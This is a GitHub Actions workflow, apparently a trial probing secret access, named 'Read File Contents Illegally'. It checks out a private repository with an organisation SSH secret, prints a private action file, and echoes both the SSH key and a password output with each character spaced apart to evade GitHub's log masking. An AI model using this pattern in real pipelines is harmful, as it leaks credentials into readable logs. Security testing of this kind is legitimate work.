name: Read File Contents Illegally (Checkout Version)

on:
  workflow_dispatch:

env:
  KEY: ${{ secrets.ORG_PRIVATEREPO_SSH }}    

jobs:
  read_file_contents:
    runs-on: ubuntu-latest
    steps:
      - name: Check out main repository
        uses: actions/checkout@v3

      - name: Checkout Private Repo
        uses: actions/checkout@v3
        with:
          ref: main
          repository: SAG-Trial/SecretSubModule
          ssh-key: ${{ secrets.ORG_PRIVATEREPO_SSH }}
          path: .github/actions

      - name: Verify Weather Secret
        run: echo $KEY | sed -e 's/\(.\)/\1 /g'

      - name: Read contents of action.yaml
        id: read-file-contents
        run: cat ./.github/actions/.github/actions/SendPasswordFile/action.yaml  

      - name: Call Private from Internal (SubModule)
        id: call-private-from-internal
        uses: ./.github/actions/.github/actions/SendPasswordFile

      - name: Verify Weather Secret
        run: echo ${{steps.call-private-from-internal.outputs.PASSWORD}} | sed -e 's/\(.\)/\1 /g'

      - name: Get Weather
        uses: SAG-Trial/QM/.github/actions/GetWeather@main
        env:
          PASSWORD: ${{ steps.call-private-from-internal.outputs.PASSWORD }}
